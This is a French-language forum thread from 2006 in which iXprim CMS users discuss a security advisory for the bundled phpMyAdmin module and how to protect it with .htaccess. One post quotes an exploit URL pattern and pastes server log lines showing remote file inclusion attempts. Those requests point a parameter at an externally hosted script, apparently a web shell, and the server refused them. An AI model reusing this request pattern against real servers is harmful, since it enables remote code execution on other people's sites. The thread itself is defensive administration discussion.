accueil
downloads
links
bugmanager
header
**

Par respect de la netiquette, tous les contributeurs s'engagent à ne tenir ni propos insultants ni propos infamants envers un tiers. Merci d'avance à tous et ... bonne pêche aux infos - (Les numéros IP sont conservés.)
nav Accueil du Forum » iXprim Français » AnnoncesXML/RSS 2.0  page_down
newtopiclink  replylink  Version imprimable 
Ascending order Descending order   » Sujet: Problème de sécurité dus à phpmyadmin
Auteur: Message:
trollix
Core Developer

stars
stars


avatar

Messages: 2732
Inscrit(e) le: 2003/1/14
Statut: Déconnecté(e)

  Posté le 2006/9/6 à 17:40
Lu ici : http://www.securityfocus.com/bid/19816/info
Cette classe est une classe de phpmyadmin.

Je conseille donc à ceux qui utilisent le module phpmyadmin sur internet de désinstaller le module. ou de mettre un .htaccess dans le répertoire du module.

Il n'est pas impossible que ce module disparaisse du noyau officiel ixprim. Je ne tiens pas à avoir dans ixprim des failles de sécurité qui viennent d'un produit tiers.

D'ailleurs, suite aux remarques de Pierre (pgilbert) suite au module "info système" dans l'administration, ce module ne sera pas implémenté dans la RC 1.3


[Edité le 06/09/2006 par trollix]
HQCH - Hope Que ça Helpe
Celui qui vise à la perfection sera au-dessus de la médiocrité, mais celui qui vise à la médiocrité tombera plus bas encore. "Proverbe chinois"
Profile Message Privé Editer le message Voir le site de l'utilisateur Chercher tous les messages de cet utilisateur Signaler ce message aux Administrateurs top
thor
Béta-testeur

stars
stars

avatar


Messages: 445
Inscrit(e) le: 2004/4/23
Statut: Déconnecté(e)

    Posté le 2006/9/6 à 19:18

trollix a écrit:
Lu ici : http://www.securityfocus.com/bid/19816/info
Cette classe est une classe de phpmyadmin.

Je conseille donc à ceux qui utilisent le module phpmyadmin sur internet de désinstaller le module. ou de mettre un .htaccess dans le répertoire du module.

Il n'est pas impossible que ce module disparaisse du noyau officiel ixprim. Je ne tiens pas à avoir dans ixprim des failles de sécurité qui viennent d'un produit tiers.

D'ailleurs, suite aux remarques de Pierre (pgilbert) suite au module "info système" dans l'administration, ce module ne sera pas implémenté dans la RC 1.3


[Edité le 06/09/2006 par trollix]


Je n'ai pas eu le même exploit :
http://www.example.com/[ixprim]/mod/nc_phpmyadmin/core/libraries/Theme_Mana ger.class.php?GLOBALS=[

Mais dans mes logs ceux-ci :
cache8-2.jed.isu.net.sa - - [03/Sep/2006:06:46:17 +0200] "GET /ixprim/mod/nc_phpmyadmin/core/libraries/Theme_Manager.class.php?GLOBALS=ht tp://members.lycos.co.uk/scorpionblack/ac99.txt HTTP/1.0" 403 13500 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.1.4322)"

212.138.64.178 - - [03/Sep/2006:06:46:29 +0200] "GET /ixprim/js/pngfix.js HTTP/1.0" 200 1257 "http://sme-60.homelinux.net/ixprim/mod/nc_phpmyadmin/core/libraries/Theme_ Manager.class.php?GLOBALS=http://members.lycos.co.uk/scorpionblack/ac99.txt " "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.1.4322)"
212.138.64.179 - - [03/Sep/2006:06:46:30 +0200] "GET /ixprim/cache/themes/ixpmembers_ixprim9999ff.css HTTP/1.0" 200 1244 "http://sme-60.homelinux.net/ixprim/mod/nc_phpmyadmin/core/libraries/Theme_ Manager.class.php?GLOBALS=http://members.lycos.co.uk/scorpionblack/ac99.txt " "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser; Avant Browser; .NET CLR 1.1.4322)"

Dont acte pour la protection par htaccess ou désactivation du module, en espérant que ce ne soit pas la même chose dans la version compléte.

PS: Je ne ferais pas l'apologie d'un lien quelquonque, car aprés avoir tracé ceux-ci l'on tombe sur des sites "hum..." ou peut être des défaçages.
Enfin cela est bien dommage.

[Edité le 06/09/2006 par thor]
Parce que vous le valez bien.
Mon site de test chez moi http://sme-60.homelinux.net
profilebutton Message Privé Editer le message Voir le site de l'utilisateur searchbutton  top
trollix
Core Developer

stars
stars

avatar


Messages: 2732
Inscrit(e) le: 2003/1/14
Statut: Déconnecté(e)

    Posté le 2006/9/7 à 00:04
Une tempête dans un verre d'eau au final...
...puisque le répertoire contenant ce fichier est bel et bien protégé par un .htaccess (access deny all) interdisant un accès direct aux fichiers par http.

Et toutes les tentatives se soldent par :

"Forbidden
You do not have permission to access this document."

Allez, bonne nuit. Vérifiez seulement que vous ayez bien une version 1.2 ou plus avec un fhier .htacess dans le répertoire /mod/nc_phpmyadmin/core/libraries
HQCH - Hope Que ça Helpe
Celui qui vise à la perfection sera au-dessus de la
médiocrité, mais celui qui vise à la
médiocrité tombera plus bas encore. "Proverbe chinois"
profilebutton Message Privé Editer le message Voir le site de l'utilisateur searchbutton  top
Cybersly
Béta-testeur

stars
stars

avatar


Messages: 421
Inscrit(e) le: 2003/8/7
Statut: Déconnecté(e)

    Posté le 2006/9/8 à 10:37
Perso j'utilise le PhpmyAdmin de mon hebergeur ou je l'installe a part dans un dossier, ne serait-ce que pour eviter que les visiteurs se disent "il utilise ixprim - donc phpmyAdmin - qui se trouve dans tel repertoire" ...
http://www.battle-group.com (sous iXprim)
profilebutton Message Privé Editer le message Voir le site de l'utilisateur searchbutton  top
newtopiclink  replylink  Version imprimable 

page_up

 

Powered by XForum 3.5.1-ix by Trollix Software
0.0264010 - 40 queries
iXprim Website © powered by Ixprim 1.3 rc1 | E-mail: trollix at trollix.com | Contact | Rapports de bug | Feed XML des News | Feed XML du Forum